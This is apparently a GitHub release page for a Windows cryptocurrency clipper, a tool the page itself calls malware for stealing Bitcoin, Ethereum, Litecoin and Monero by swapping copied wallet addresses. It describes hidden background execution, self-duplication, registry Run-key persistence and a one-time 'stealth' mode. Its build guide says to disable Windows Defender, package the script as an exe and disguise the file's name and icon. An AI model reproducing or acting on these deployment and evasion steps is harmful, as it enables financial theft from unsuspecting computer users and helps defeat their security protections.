Skip to content

2024-2

Compare
Choose a tag to compare
@tiffm111 tiffm111 released this 22 Dec 13:27
· 2 commits to main since this release
9e8b554

Windows crypto clipper - USE MAIN.PYW AS EXE FOR STEALTH AS IT DOESNT HAVE TERMINAL (RUNS IN BACKGROUND HIDDEN)
BTC, ETH, LTC, XMR clipper written in python using no external packages. ONLY WORKS ON WINDOWS
WARNING: THIS IS MALWARE DESIGNED FOR STEALING CRYPTOCURRENCY. USE UNINSTALL GUIDE IF UNINSTALL CODE FAILS. (not found error doesn't necessarily mean didnt uninstall)

Features

Supports Bitcoin, Ethereum, Litecoin, Monero
Has a single use option. (Will only ever clip once and then never again, kind of like a stealth mode)
Works as .exe
Duplicates and adds to startup with registry
Uses powershell to read and set clipboard
Has an uninstaller
If single_use is True and a address has been copied the program will exit.
If single_use is True and the computer restarts the registry (startup) entry will be removed

How to make into .exe

Turn off windows defender

pip install pyinstaller

pyinstaller --onefile main.pyw

when .exe is ran it will duplicate, add to startup and monitor clipboard. You can rename and change icon of the exe.

if computer is turned on and off/restarted the program will run at startup as the task "clppth.exe".

For manual uninstall

Windows key + r
%appdata%
Delete folder Storage0 and folder CLPPTH
Goto registry editor
Goto Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Delete entry CLPPTH